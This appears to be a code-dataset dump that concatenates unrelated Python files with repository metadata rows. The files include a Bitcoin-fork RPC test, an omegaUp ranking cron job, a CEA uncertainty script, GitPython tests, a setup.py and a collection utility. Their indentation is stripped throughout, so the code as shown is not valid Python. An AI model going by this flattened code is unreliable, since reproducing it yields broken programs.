def _sentence(self, v: str) -> str:
return v.capitalize().strip(".") + "."
def _pretty(self, v: Optional[Sequence[Any]]) -> str:
if v is None:
v = []
return ", ".join(['"' + str(k) + '"' for k in v])
def _list(self, v: Optional[Sequence[Any]]) -> str:
if v is None:
v = []
return "[" + ", ".join(['"' + str(k) + '"' for k in v]) + "]"
__all__ = ["LiteralParser"]
| 38.991597
| 92
| 0.575431
|
4a189027d916d993bf0de1946da105435c7affd6
| 4,831
|
py
|
Python
|
test/functional/rpc_deprecated.py
|
cibadmin/GLBTC
|
52a0c8bfcb7abce8f97412dd1fd817335657896b
|
[
"MIT"
] | null | null | null |
test/functional/rpc_deprecated.py
|
cibadmin/GLBTC
|
52a0c8bfcb7abce8f97412dd1fd817335657896b
|
[
"MIT"
] | null | null | null |
test/functional/rpc_deprecated.py
|
cibadmin/GLBTC
|
52a0c8bfcb7abce8f97412dd1fd817335657896b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test deprecation of RPC calls."""
from test_framework.test_framework import GlobalBitcoinTestFramework
from test_framework.util import assert_raises_rpc_error
class DeprecatedRpcTest(GlobalBitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [[], ["-deprecatedrpc=validateaddress", "-deprecatedrpc=accounts"]]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
# This test should be used to verify correct behaviour of deprecated
# RPC methods with and without the -deprecatedrpc flags. For example:
#
# self.log.info("Make sure that -deprecatedrpc=createmultisig allows it to take addresses")
# assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, [self.nodes[0].getnewaddress()])
# self.nodes[1].createmultisig(1, [self.nodes[1].getnewaddress()])
self.log.info("Test validateaddress deprecation")
SOME_ADDRESS = "mnvGjUy3NMj67yJ6gkK5o9e5RS33Z2Vqcu" # This is just some random address to pass as a parameter to validateaddress
dep_validate_address = self.nodes[0].validateaddress(SOME_ADDRESS)
assert "ismine" not in dep_validate_address
not_dep_val = self.nodes[1].validateaddress(SOME_ADDRESS)
assert "ismine" in not_dep_val
self.log.info("Test accounts deprecation")
# The following account RPC methods are deprecated:
# - getaccount
# - getaccountaddress
# - getaddressesbyaccount
# - getreceivedbyaccount
# - listaccounts
# - listreceivedbyaccount
# - move
# - setaccount
#
# The following 'label' RPC methods are usable both with and without the
# -deprecatedrpc=accounts switch enabled.
# - getaddressesbylabel
# - getreceivedbylabel
# - listlabels
# - listreceivedbylabel
# - setlabel
#
address0 = self.nodes[0].getnewaddress()
self.nodes[0].generatetoaddress(101, address0)
self.sync_all()
address1 = self.nodes[1].getnewaddress()
self.nodes[1].generatetoaddress(101, address1)
self.log.info("- getaccount")
assert_raises_rpc_error(-32, "getaccount is deprecated", self.nodes[0].getaccount, address0)
self.nodes[1].getaccount(address1)
self.log.info("- setaccount")
assert_raises_rpc_error(-32, "setaccount is deprecated", self.nodes[0].setaccount, address0, "label0")
self.nodes[1].setaccount(address1, "label1")
self.log.info("- setlabel")
self.nodes[0].setlabel(address0, "label0")
self.nodes[1].setlabel(address1, "label1")
self.log.info("- getaccountaddress")
assert_raises_rpc_error(-32, "getaccountaddress is deprecated", self.nodes[0].getaccountaddress, "label0")
self.nodes[1].getaccountaddress("label1")
self.log.info("- getaddressesbyaccount")
assert_raises_rpc_error(-32, "getaddressesbyaccount is deprecated", self.nodes[0].getaddressesbyaccount, "label0")
self.nodes[1].getaddressesbyaccount("label1")
self.log.info("- getaddressesbylabel")
self.nodes[0].getaddressesbylabel("label0")
self.nodes[1].getaddressesbylabel("label1")
self.log.info("- getreceivedbyaccount")
assert_raises_rpc_error(-32, "getreceivedbyaccount is deprecated", self.nodes[0].getreceivedbyaccount, "label0")
self.nodes[1].getreceivedbyaccount("label1")
self.log.info("- getreceivedbylabel")
self.nodes[0].getreceivedbylabel("label0")
self.nodes[1].getreceivedbylabel("label1")
self.log.info("- listaccounts")
assert_raises_rpc_error(-32, "listaccounts is deprecated", self.nodes[0].listaccounts)
self.nodes[1].listaccounts()
self.log.info("- listlabels")
self.nodes[0].listlabels()
self.nodes[1].listlabels()
self.log.info("- listreceivedbyaccount")
assert_raises_rpc_error(-32, "listreceivedbyaccount is deprecated", self.nodes[0].listreceivedbyaccount)
self.nodes[1].listreceivedbyaccount()
self.log.info("- listreceivedbylabel")
self.nodes[0].listreceivedbylabel()
self.nodes[1].listreceivedbylabel()
self.log.info("- move")
assert_raises_rpc_error(-32, "move is deprecated", self.nodes[0].move, "label0", "label0b", 10)
self.nodes[1].move("label1", "label1b", 10)
if __name__ == '__main__':
DeprecatedRpcTest().main()
| 43.133929
| 137
| 0.677292
|
4a1890a20235727b49650dd84c9a82d5db9ec286
| 6,368
|
py
|
Python
|
stuff/cron/update_user_rank.py
|
categulario/omegaup
|
bfe32b9b4f58743d941f13ea707279885a30567f
|
[
"BSD-3-Clause"
] | 1
|
2018-08-28T22:34:29.000Z
|
2018-08-28T22:34:29.000Z
|
stuff/cron/update_user_rank.py
|
categulario/omegaup
|
bfe32b9b4f58743d941f13ea707279885a30567f
|
[
"BSD-3-Clause"
] | null | null | null |
stuff/cron/update_user_rank.py
|
categulario/omegaup
|
bfe32b9b4f58743d941f13ea707279885a30567f
|
[
"BSD-3-Clause"
] | 1
|
2018-08-28T22:34:31.000Z
|
2018-08-28T22:34:31.000Z
|
#!/usr/bin/python3
'''Updates the user ranking.'''
import argparse
import collections
import configparser
import getpass
import logging
import os
import MySQLdb
Cutoff = collections.namedtuple('Cutoff', ['percentile', 'classname'])
def update_user_rank(cur):
'''Updates the user ranking.'''
cur.execute('DELETE FROM `User_Rank`;')
logging.info('Updating accepted stats for problems...')
cur.execute('''
UPDATE
Problems p
SET
p.accepted = (
SELECT
COUNT(DISTINCT r.identity_id)
FROM
Runs r
WHERE
r.problem_id = p.problem_id AND r.verdict = 'AC'
);
''')
logging.info('Updating user rank...')
cur.execute('''
SELECT
i.username,
i.name,
i.country_id,
i.state_id,
i.school_id,
up.identity_id,
i.user_id,
COUNT(ps.problem_id) problems_solved_count,
SUM(ROUND(100 / LOG(2, ps.accepted+1) , 0)) score
FROM
(
SELECT DISTINCT
r.identity_id,
r.problem_id
FROM
Runs r
WHERE
r.verdict = 'AC' AND r.type = 'normal'
) AS up
INNER JOIN
Problems ps ON ps.problem_id = up.problem_id AND ps.visibility > 0
INNER JOIN
Identities i ON i.identity_id = up.identity_id
INNER JOIN
Users u ON u.user_id = i.user_id
WHERE
u.is_private = 0
GROUP BY
identity_id
ORDER BY
score DESC;
''')
rank = 0
prev_score = None
# MySQL has no good way of obtaining percentiles, so we'll store the sorted
# list of scores in order to calculate the cutoff scores later.
scores = []
for row in cur:
if row['score'] != prev_score:
rank += 1
scores.append(row['score'])
prev_score = row['score']
cur.execute('''
INSERT INTO
User_Rank (user_id, rank, problems_solved_count, score,
username, name, country_id, state_id,
school_id)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s);''',
(row['user_id'], rank, row['problems_solved_count'],
row['score'], row['username'], row['name'],
row['country_id'], row['state_id'], row['school_id']))
return scores
def update_user_rank_cutoffs(cur, scores):
'''Updates the user ranking cutoff table.'''
cur.execute('DELETE FROM `User_Rank_Cutoffs`;')
logging.info('Updating ranking cutoffs...')
cutoffs = [
Cutoff(.01, 'user-rank-international-master'),
Cutoff(.09, 'user-rank-master'),
Cutoff(.15, 'user-rank-expert'),
Cutoff(.35, 'user-rank-specialist'),
Cutoff(.40, 'user-rank-beginner'),
]
if not scores:
return
for cutoff in cutoffs:
# Scores are already in descending order. That will also bias the
# cutoffs towards higher scores.
cur.execute('''
INSERT INTO
User_Rank_Cutoffs (score, percentile, classname)
VALUES(%s, %s, %s);''',
(scores[int(len(scores) * cutoff.percentile)],
cutoff.percentile, cutoff.classname))
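# Hedged illustration of the cutoff lookup above: because `scores` is sorted
# in descending order, scores[int(len(scores) * percentile)] is the lowest
# score still inside the top `percentile` fraction of users (ties are biased
# towards higher scores). For example, with ten users:
#
# scores = [900, 750, 600, 480, 300, 250, 120, 90, 60, 10] # descending
# scores[int(len(scores) * 0.15)] # index 1 -> 750, the top-15% cutoff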
def mysql_connect(args):
'''Connects to MySQL with the arguments provided.
Returns a MySQLdb connection.'''
host = args.host
user = args.user
password = args.password
if user is None and os.path.isfile(args.mysql_config_file):
config = configparser.ConfigParser()
config.read(args.mysql_config_file)
# Puppet quotes some configuration entries.
host = config['client']['host'].strip("'")
user = config['client']['user'].strip("'")
password = config['client']['password'].strip("'")
if password is None:
password = getpass.getpass()
assert user is not None, 'Missing --user parameter'
assert host is not None, 'Missing --host parameter'
assert password is not None, 'Missing --password parameter'
return MySQLdb.connect(
host=host,
user=user,
passwd=password,
db=args.database,
)
def main():
'''Main entrypoint.'''
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--mysql-config-file',
default=os.path.join(os.getenv('HOME') or '.',
'.my.cnf'),
help='.my.cnf file that stores credentials')
parser.add_argument('--quiet', '-q', action='store_true',
help='Disables logging')
parser.add_argument('--verbose', '-v', action='store_true',
help='Enables verbose logging')
parser.add_argument('--logfile', type=str, default=None,
help='Enables logging to a file')
parser.add_argument('--host', type=str, help='MySQL host',
default='localhost')
parser.add_argument('--user', type=str, help='MySQL username')
parser.add_argument('--password', type=str, help='MySQL password')
parser.add_argument('--database', type=str, help='MySQL database',
default='omegaup')
args = parser.parse_args()
logging.basicConfig(filename=args.logfile,
format='%%(asctime)s:%s:%%(message)s' % parser.prog,
level=(logging.DEBUG if args.verbose else
logging.INFO if not args.quiet else
logging.ERROR))
logging.info('Started')
dbconn = mysql_connect(args)
try:
with dbconn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cur:
scores = update_user_rank(cur)
update_user_rank_cutoffs(cur, scores)
dbconn.commit()
except: # pylint: disable=bare-except
logging.exception('Failed to update user ranking')
finally:
dbconn.close()
logging.info('Done')
if __name__ == '__main__':
main()
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
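# Hedged invocation example (flags as defined by the argparse setup above;
# the user and database names are placeholders):
#
#   python3 update_user_rank.py --user omegaup --database omegaup --verbose
#
# If --password is omitted and no ~/.my.cnf is found, the script prompts for
# the password interactively via getpass.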
| 32.824742
| 79
| 0.549152
|
4a1890af83bf2dc6395fd9ebe6b3903561bdca30
| 3,966
|
py
|
Python
|
cea/analysis/uncertainty/Individual_Evaluation.py
|
pajotca/CityEnergyAnalyst
|
f3d0a08f7b5f5967961bf831625544a95c7702f0
|
[
"MIT"
] | null | null | null |
cea/analysis/uncertainty/Individual_Evaluation.py
|
pajotca/CityEnergyAnalyst
|
f3d0a08f7b5f5967961bf831625544a95c7702f0
|
[
"MIT"
] | null | null | null |
cea/analysis/uncertainty/Individual_Evaluation.py
|
pajotca/CityEnergyAnalyst
|
f3d0a08f7b5f5967961bf831625544a95c7702f0
|
[
"MIT"
] | null | null | null |
"""
This file helps in evaluating the individuals of a given generation. It is useful when you need to change the global
variables and see how the objective function values change.
Make sure you have uncertainty.csv, which is produced by running uncertainty_parameters.py.
This is part of the uncertainty analysis.
"""
from __future__ import division
import cea.config
import cea.globalvar
import cea.inputlocator
import pandas as pd
import cea.optimization.distribution.network_opt_main as network_opt
import cea.optimization.master.evaluation as evaluation
import json
import csv
from cea.optimization.lca_calculations import lca_calculations
from cea.optimization.prices import Prices
__author__ = "Sreepathi Bhargava Krishna"
__copyright__ = "Copyright 2017, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Sreepathi Bhargava Krishna"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "thomas@arch.ethz.ch"
__status__ = "Production"
def individual_evaluation(generation, level, size, variable_groups):
"""
:param generation: Generation of the optimization in which the individual evaluation is to be done
:type generation: int
:param level: Number of the uncertain scenario. For each scenario, the objectives are calculated
:type level: int
:param size: Total uncertain scenarios developed. See 'uncertainty.csv'
:type size: int
:return: Function saves the new objectives in a json file
"""
from cea.optimization.preprocessing.preprocessing_main import preproccessing
gv = cea.globalvar.GlobalVariables()
scenario_path = gv.scenario_reference
locator = cea.inputlocator.InputLocator(scenario_path)
config = cea.config.Configuration()
weather_file = locator.get_default_weather()
with open(locator.get_optimization_master_results_folder() + "\\CheckPoint_" + str(generation), "rb") as fp:
data = json.load(fp)
pop = data['population']
ntwList = data['networkList']
# # Uncertainty Part
row = []
with open(locator.get_uncertainty_results_folder() + '\\uncertainty.csv') as f:
reader = csv.reader(f)
for i in xrange(size+1):
row.append(next(reader))
j = level + 1
for i in xrange(len(row[0])-1):
setattr(gv, row[0][i+1], float(row[j][i+1]))
total_demand = pd.read_csv(locator.get_total_demand())
building_names = total_demand.Name.values
gv.num_tot_buildings = total_demand.Name.count()
lca = lca_calculations(locator, config)
prices = Prices(locator, config)
extra_costs, extra_CO2, extra_primary_energy, solarFeat = preproccessing(locator, total_demand,
building_names,
weather_file, gv)
network_features = network_opt.network_opt_main()
def objective_function(ind, ind_num):
(costs, CO2, prim) = evaluation.evaluation_main(ind, building_names, locator, solarFeat, network_features, gv,
config, prices, lca,
ind_num, generation
)
# print (costs, CO2, prim)
return (costs, CO2, prim)
fitness = []
for i in xrange(gv.initialInd):
evaluation.checkNtw(pop[i], ntwList, locator, gv)
fitness.append(objective_function(pop[i], i))
with open(locator.get_uncertainty_checkpoint(level), "wb") as fp:
cp = dict(population=pop, uncertainty_level=level, population_fitness=fitness)
json.dump(cp, fp)
if __name__ == '__main__':
generation = 50 # generation which you are interested in testing
size = 1000 # number of uncertain scenarios being tested
for i in xrange(size):
individual_evaluation(generation, i, size, variable_groups=('ECONOMIC',))
| 40.469388
| 118
| 0.669692
|
4a1890c8baff409fea52bb01c421d58b6f4ec95b
| 73
|
py
|
Python
|
example_minimal.py
|
fmasdev1/stackoverflow_tag_cloud
|
ab02d0adfa643c84025e98f7251dd587b5aec1df
|
[
"MIT"
] | 22
|
2016-01-12T15:36:28.000Z
|
2020-06-24T22:45:43.000Z
|
example_minimal.py
|
fmasdev1/stackoverflow_tag_cloud
|
ab02d0adfa643c84025e98f7251dd587b5aec1df
|
[
"MIT"
] | 2
|
2019-06-05T08:05:11.000Z
|
2021-11-03T11:29:22.000Z
|
example_minimal.py
|
fmasdev1/stackoverflow_tag_cloud
|
ab02d0adfa643c84025e98f7251dd587b5aec1df
|
[
"MIT"
] | 12
|
2017-10-13T10:41:23.000Z
|
2022-01-03T19:48:24.000Z
|
from stackoverflow_users_taginfo import tag_cloud
tag_cloud(link=22656)
| 18.25
| 49
| 0.876712
|
4a18922d4f361bb7c09afaa33536dedc96f3584a
| 141
|
py
|
Python
|
crm_th/clievents/views.py
|
covrom/django_sample
|
f659588373fe8c95939b3ef14d2733d6b95384ba
|
[
"MIT"
] | null | null | null |
crm_th/clievents/views.py
|
covrom/django_sample
|
f659588373fe8c95939b3ef14d2733d6b95384ba
|
[
"MIT"
] | null | null | null |
crm_th/clievents/views.py
|
covrom/django_sample
|
f659588373fe8c95939b3ef14d2733d6b95384ba
|
[
"MIT"
] | null | null | null |
from material.frontend.views import ModelViewSet
from . import models
class SpectacleViewSet(ModelViewSet):
model = models.Spectacle
| 15.666667
| 48
| 0.794326
|
4a189267ed368b204e6bf0a6d2f74c812549ec0b
| 11,154
|
py
|
Python
|
lib/third_party/GitPython/git/test/test_git.py
|
magnetic-lab/tdgg
|
3a80ed82f4b6d1cd2e7a127e079a27141b2e0422
|
[
"MIT"
] | 5
|
2019-08-14T07:24:10.000Z
|
2020-04-15T11:47:48.000Z
|
lib/third_party/GitPython/git/test/test_git.py
|
magnetic-lab/tdgg
|
3a80ed82f4b6d1cd2e7a127e079a27141b2e0422
|
[
"MIT"
] | null | null | null |
lib/third_party/GitPython/git/test/test_git.py
|
magnetic-lab/tdgg
|
3a80ed82f4b6d1cd2e7a127e079a27141b2e0422
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# test_git.py
# Copyright (C) 2008, 2009 Michael Trier (mtrier@gmail.com) and contributors
#
# This module is part of GitPython and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
import os
import subprocess
import sys
from tempfile import TemporaryFile
from git import (
Git,
refresh,
GitCommandError,
GitCommandNotFound,
Repo,
cmd
)
from git.compat import PY3, is_darwin
from git.test.lib import (
TestBase,
patch,
raises,
assert_equal,
assert_true,
assert_match,
fixture_path
)
from git.test.lib import with_rw_directory
from git.util import finalize_process
import os.path as osp
try:
from unittest import mock
except ImportError:
import mock
from git.compat import is_win
class TestGit(TestBase):
@classmethod
def setUpClass(cls):
super(TestGit, cls).setUpClass()
cls.git = Git(cls.rorepo.working_dir)
def tearDown(self):
import gc
gc.collect()
@patch.object(Git, 'execute')
def test_call_process_calls_execute(self, git):
git.return_value = ''
self.git.version()
assert_true(git.called)
assert_equal(git.call_args, ((['git', 'version'],), {}))
def test_call_unpack_args_unicode(self):
args = Git._Git__unpack_args(u'Unicode€™')
if PY3:
mangled_value = 'Unicode\u20ac\u2122'
else:
mangled_value = 'Unicode\xe2\x82\xac\xe2\x84\xa2'
assert_equal(args, [mangled_value])
def test_call_unpack_args(self):
args = Git._Git__unpack_args(['git', 'log', '--', u'Unicode€™'])
if PY3:
mangled_value = 'Unicode\u20ac\u2122'
else:
mangled_value = 'Unicode\xe2\x82\xac\xe2\x84\xa2'
assert_equal(args, ['git', 'log', '--', mangled_value])
@raises(GitCommandError)
def test_it_raises_errors(self):
self.git.this_does_not_exist()
def test_it_transforms_kwargs_into_git_command_arguments(self):
assert_equal(["-s"], self.git.transform_kwargs(**{'s': True}))
assert_equal(["-s", "5"], self.git.transform_kwargs(**{'s': 5}))
assert_equal([], self.git.transform_kwargs(**{'s': None}))
assert_equal(["--max-count"], self.git.transform_kwargs(**{'max_count': True}))
assert_equal(["--max-count=5"], self.git.transform_kwargs(**{'max_count': 5}))
assert_equal(["--max-count=0"], self.git.transform_kwargs(**{'max_count': 0}))
assert_equal([], self.git.transform_kwargs(**{'max_count': None}))
# Multiple args are supported by using lists/tuples
assert_equal(["-L", "1-3", "-L", "12-18"], self.git.transform_kwargs(**{'L': ('1-3', '12-18')}))
assert_equal(["-C", "-C"], self.git.transform_kwargs(**{'C': [True, True, None, False]}))
# order is undefined
res = self.git.transform_kwargs(**{'s': True, 't': True})
self.assertEqual({'-s', '-t'}, set(res))
def test_it_executes_git_to_shell_and_returns_result(self):
assert_match(r'^git version [\d\.]{2}.*$', self.git.execute(["git", "version"]))
def test_it_accepts_stdin(self):
filename = fixture_path("cat_file_blob")
with open(filename, 'r') as fh:
assert_equal("70c379b63ffa0795fdbfbc128e5a2818397b7ef8",
self.git.hash_object(istream=fh, stdin=True))
@patch.object(Git, 'execute')
def test_it_ignores_false_kwargs(self, git):
# pass_this_kwarg=False implies it *should* be ignored
self.git.version(pass_this_kwarg=False)
assert_true("pass_this_kwarg" not in git.call_args[1])
@raises(GitCommandError)
def test_it_raises_proper_exception_with_output_stream(self):
tmp_file = TemporaryFile()
self.git.checkout('non-existent-branch', output_stream=tmp_file)
def test_it_accepts_environment_variables(self):
filename = fixture_path("ls_tree_empty")
with open(filename, 'r') as fh:
tree = self.git.mktree(istream=fh)
env = {
'GIT_AUTHOR_NAME': 'Author Name',
'GIT_AUTHOR_EMAIL': 'author@example.com',
'GIT_AUTHOR_DATE': '1400000000+0000',
'GIT_COMMITTER_NAME': 'Committer Name',
'GIT_COMMITTER_EMAIL': 'committer@example.com',
'GIT_COMMITTER_DATE': '1500000000+0000',
}
commit = self.git.commit_tree(tree, m='message', env=env)
assert_equal(commit, '4cfd6b0314682d5a58f80be39850bad1640e9241')
def test_persistent_cat_file_command(self):
# read header only
import subprocess as sp
hexsha = "b2339455342180c7cc1e9bba3e9f181f7baa5167"
g = self.git.cat_file(batch_check=True, istream=sp.PIPE, as_process=True)
g.stdin.write(b"b2339455342180c7cc1e9bba3e9f181f7baa5167\n")
g.stdin.flush()
obj_info = g.stdout.readline()
# read header + data
g = self.git.cat_file(batch=True, istream=sp.PIPE, as_process=True)
g.stdin.write(b"b2339455342180c7cc1e9bba3e9f181f7baa5167\n")
g.stdin.flush()
obj_info_two = g.stdout.readline()
self.assertEqual(obj_info, obj_info_two)
# read data - have to read it in one large chunk
size = int(obj_info.split()[2])
g.stdout.read(size)
g.stdout.read(1)
# now we should be able to read a new object
g.stdin.write(b"b2339455342180c7cc1e9bba3e9f181f7baa5167\n")
g.stdin.flush()
self.assertEqual(g.stdout.readline(), obj_info)
# same can be achieved using the respective command functions
hexsha, typename, size = self.git.get_object_header(hexsha)
hexsha, typename_two, size_two, data = self.git.get_object_data(hexsha) # @UnusedVariable
self.assertEqual(typename, typename_two)
self.assertEqual(size, size_two)
def test_version(self):
v = self.git.version_info
self.assertIsInstance(v, tuple)
for n in v:
self.assertIsInstance(n, int)
# END verify number types
def test_cmd_override(self):
prev_cmd = self.git.GIT_PYTHON_GIT_EXECUTABLE
exc = GitCommandNotFound
try:
# set it to something that doesn't exist, ensure it raises
type(self.git).GIT_PYTHON_GIT_EXECUTABLE = osp.join(
"some", "path", "which", "doesn't", "exist", "gitbinary")
self.failUnlessRaises(exc, self.git.version)
finally:
type(self.git).GIT_PYTHON_GIT_EXECUTABLE = prev_cmd
# END undo adjustment
def test_refresh(self):
# test a bad git path refresh
self.assertRaises(GitCommandNotFound, refresh, "yada")
# test a good path refresh
which_cmd = "where" if is_win else "which"
path = os.popen("{0} git".format(which_cmd)).read().strip().split('\n')[0]
refresh(path)
def test_options_are_passed_to_git(self):
# This works because any command after git --version is ignored
git_version = self.git(version=True).NoOp()
git_command_version = self.git.version()
self.assertEquals(git_version, git_command_version)
def test_persistent_options(self):
git_command_version = self.git.version()
# analog to test_options_are_passed_to_git
self.git.set_persistent_git_options(version=True)
git_version = self.git.NoOp()
self.assertEquals(git_version, git_command_version)
# subsequent calls keep this option:
git_version_2 = self.git.NoOp()
self.assertEquals(git_version_2, git_command_version)
# reset to empty:
self.git.set_persistent_git_options()
self.assertRaises(GitCommandError, self.git.NoOp)
def test_single_char_git_options_are_passed_to_git(self):
input_value = 'TestValue'
output_value = self.git(c='user.name=%s' % input_value).config('--get', 'user.name')
self.assertEquals(input_value, output_value)
def test_change_to_transform_kwargs_does_not_break_command_options(self):
self.git.log(n=1)
def test_insert_after_kwarg_raises(self):
# This isn't a complete add command, which doesn't matter here
self.failUnlessRaises(ValueError, self.git.remote, 'add', insert_kwargs_after='foo')
def test_env_vars_passed_to_git(self):
editor = 'non_existent_editor'
with mock.patch.dict('os.environ', {'GIT_EDITOR': editor}): # @UndefinedVariable
self.assertEqual(self.git.var("GIT_EDITOR"), editor)
@with_rw_directory
def test_environment(self, rw_dir):
# sanity check
self.assertEqual(self.git.environment(), {})
# make sure the context manager works and cleans up after itself
with self.git.custom_environment(PWD='/tmp'):
self.assertEqual(self.git.environment(), {'PWD': '/tmp'})
self.assertEqual(self.git.environment(), {})
old_env = self.git.update_environment(VARKEY='VARVALUE')
# The returned dict can be used to revert the change, hence why it has
# an entry with value 'None'.
self.assertEqual(old_env, {'VARKEY': None})
self.assertEqual(self.git.environment(), {'VARKEY': 'VARVALUE'})
new_env = self.git.update_environment(**old_env)
self.assertEqual(new_env, {'VARKEY': 'VARVALUE'})
self.assertEqual(self.git.environment(), {})
path = osp.join(rw_dir, 'failing-script.sh')
with open(path, 'wt') as stream:
stream.write("#!/usr/bin/env sh\n"
"echo FOO\n")
os.chmod(path, 0o777)
rw_repo = Repo.init(osp.join(rw_dir, 'repo'))
remote = rw_repo.create_remote('ssh-origin', "ssh://git@server/foo")
with rw_repo.git.custom_environment(GIT_SSH=path):
try:
remote.fetch()
except GitCommandError as err:
if sys.version_info[0] < 3 and is_darwin:
self.assertIn('ssh-orig', str(err))
self.assertEqual(err.status, 128)
else:
self.assertIn('FOO', str(err))
def test_handle_process_output(self):
from git.cmd import handle_process_output
line_count = 5002
count = [None, 0, 0]
def counter_stdout(line):
count[1] += 1
def counter_stderr(line):
count[2] += 1
cmdline = [sys.executable, fixture_path('cat_file.py'), str(fixture_path('issue-301_stderr'))]
proc = subprocess.Popen(cmdline,
stdin=None,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
creationflags=cmd.PROC_CREATIONFLAGS,
)
handle_process_output(proc, counter_stdout, counter_stderr, finalize_process)
self.assertEqual(count[1], line_count)
self.assertEqual(count[2], line_count)
| 37.555556
| 104
| 0.630536
|
4a18928192864cdeef25d0259df90af1834eee65
| 1,677
|
py
|
Python
|
setup.py
|
autorope/donkeybarn
|
f7e985e850dea3c2a4352e00cb6337a9ab357113
|
[
"MIT"
] | 4
|
2019-01-05T04:43:04.000Z
|
2021-04-05T11:54:20.000Z
|
setup.py
|
autorope/donkeybarn
|
f7e985e850dea3c2a4352e00cb6337a9ab357113
|
[
"MIT"
] | null | null | null |
setup.py
|
autorope/donkeybarn
|
f7e985e850dea3c2a4352e00cb6337a9ab357113
|
[
"MIT"
] | 2
|
2019-01-05T04:43:05.000Z
|
2019-11-08T02:17:29.000Z
|
from setuptools import setup, find_packages
import os
with open("README.md", "r") as fh:
long_description = fh.read()
setup(name='donkeybarn',
version='0.0.1',
description='Functions to train advanced donkeycar autopilots.',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/autorope/donkeycar',
author='Will Roscoe',
author_email='wroscoe@gmail.com',
license='MIT',
install_requires=['numpy',
'pandas',
'docopt',
'requests',
'h5py',
'moviepy',
'joblib',
'tqdm',
],
include_package_data=True,
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3.6',
],
keywords='selfdriving cars donkeycar diyrobocars',
packages=find_packages(exclude=(['tests', 'docs', 'site', 'env'])),
)
| 30.490909
| 79
| 0.550388
|
4a1894ab2bfdc37571341674a81610217efafdcf
| 3,499
|
py
|
Python
|
Source/Utilities/Collection.py
|
Dmunch04/SquareIt
|
0379b208afa397b349c119f15e2611ec93f3bedb
|
[
"MIT"
] | 1
|
2019-07-01T10:07:30.000Z
|
2019-07-01T10:07:30.000Z
|
Source/Utilities/Collection.py
|
Dmunch04/SquareIt
|
0379b208afa397b349c119f15e2611ec93f3bedb
|
[
"MIT"
] | null | null | null |
Source/Utilities/Collection.py
|
Dmunch04/SquareIt
|
0379b208afa397b349c119f15e2611ec93f3bedb
|
[
"MIT"
] | null | null | null |
from DavesLogger import Logs
class Collection (dict):
__slots__ = (
'Instance',
'Index'
)
def __init__ (self, Instance = dict, Indexor = 'ID'):
dict.__init__ (self)
self.Instance = Instance
self.Index = Indexor
def __add__ (self, _Value):
""" Adds support for using + on this """
if isinstance (_Value, Collection):
if _Value.Instance is self.Instance:
for Item in _Value.values ():
self.Add (Item)
elif isinstance (_Value, self.Instance):
self.Add (_Value)
else:
raise Logs.Error (f'{_Value} is not a Collection or an instance of {self.Instance}!')
return self
def __iadd__ (self, _Value):
""" Adds support for using += on this """
return self.__add__ (_Value)
def __setitem__ (self, _Key, _Value):
""" Adds support for using this[Key] = Value on this """
if not isinstance (_Value, self.Instance):
Logs.Error (f'{_Value} is not instance of {self.Instance}!')
dict.__setitem__ (self, _Key, _Value)
def Add (self, _Item):
""" Adds a new item to the collection """
if not isinstance (_Item, self.Instance):
Logs.Error (f'{_Item} is not instance of {self.Instance}!')
Index = getattr (_Item, self.Index, None)
if Index is None:
Logs.Error (f'{self.Index} of {repr (_Item)} is invalid!')
self[Index] = _Item
def Remove (self, _Item):
""" Removes an item from the collection """
if isinstance (_Item, self.Instance):
if getattr (_Item, self.Index, None) is not None:
del self[getattr (_Item, self.Index)]
else:
if _Item in self:
del self[_Item]
def RemoveIf (self, **_Attributes):
""" Removes every item from the collection that matches the given attributes """
for Key, Value in list (self.items ()):
if self.HasAttributes (Value, **_Attributes):
del self[Key]
def RemoveIndex (self, _Index):
""" Removes an item from the collection, by it's id """
del self[_Index]
def HasAttributes (self, _Object, **_Attributes):
""" Checks if _Object has _Attributes """
for Key, Value in _Attributes.items ():
if not getattr (_Object, Key, None) == Value:
return False
return True
def Has (self, _ID):
""" Check if the collection contains an object with the given id """
if isinstance (_ID, self.Instance):
return self.__contains__ (getattr (_ID, self.Index, None))
for Item in self.values ():
if getattr (Item, self.Index, None) == _ID:
return True
return False
def Find (self, _Condition):
""" Find all objects which meet the callable condition """
return [Item for Item in self.values () if _Condition (Item)]
def FindOne (self, _Condition):
""" Find the first object which meets the callable condition """
for Item in self.values ():
if _Condition (Item):
return Item
def Get (self, _ID = None, **_Attributes):
""" Get an item from the collection by its id, plus attributes to filter by """
_Attributes[self.Index] = _ID or _Attributes.get (self.Index)
return self.FindOne (lambda X: self.HasAttributes (X, **_Attributes))
def GetAll (self):
""" Returns all the items in the collection as a list """
return [self[Item] for Item in self]
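# --- Hedged usage sketch (illustrative names only) ---
# A toy class carrying an `ID` attribute, matching the default Indexor above:
#
# class User:
#     def __init__ (self, ID, Name):
#         self.ID = ID
#         self.Name = Name
#
# Users = Collection (Instance = User)
# Users.Add (User (1, 'Dave'))
# Users += User (2, 'Anna') # __iadd__ -> __add__ -> Add
# Users.Get (1).Name # -> 'Dave'
# Users.RemoveIf (Name = 'Anna') # drops every item whose Name is 'Anna'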
| 28.917355
| 83
| 0.573307
|
